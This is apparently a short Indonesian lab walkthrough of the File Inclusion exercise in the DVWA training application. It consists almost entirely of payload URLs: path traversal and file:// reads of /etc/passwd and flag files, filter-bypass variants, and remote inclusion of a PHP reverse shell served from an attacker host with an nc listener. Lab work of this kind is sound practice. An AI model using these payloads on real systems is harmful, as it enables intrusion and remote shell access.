File Inclusion Attack adalah jenis celah keamanan web yang memungkinkan penyerang mengakses file sensitif di server atau memungkinkan mereka untuk menjalankan file berbahaya di server mereka.
http://<IP_Server>/DVWA/vulnerabilities/fi/?page=file4.php
http://<IP_Server>/DVWA/vulnerabilities/fi/?page=../../hackable/flags/fi.php
Membuka isi file /etc/passwd di server
http://<IP_Server>/DVWA/vulnerabilities/fi/?page=../../../../../../etc/passwd
Menjalankan file php-reverse-shell.php ke server
python3 -m http.server 80nc -lnvp <port>http://<IP_Server>/DVWA/vulnerabilities/fi/?page=http://<IP_Attacker>/php-reverse-shell.php
http://<IP_Server>/DVWA/vulnerabilities/fi/?page=....//....//hackable/flags/fi.phpMembuka isi file /etc/passwd di server
http://<IP_Server>/DVWA/vulnerabilities/fi/?page=....//....//....//....//....//....//etc/passwdMenjalankan file php-reverse-shell.php ke server
http://<IP_Server>/DVWA/vulnerabilities/fi/?page=hthttp://tp://<IP_Attacker>/php-reverse-shell.phphttp://<IP_Server>/DVWA/vulnerabilities/fi/?page=file:///var/www/html/DVWA/hackable/flags/fi.phpMembuka isi file /etc/passwd di server
http://<IP_Server>/DVWA/vulnerabilities/fi/?page=file:///etc/passwd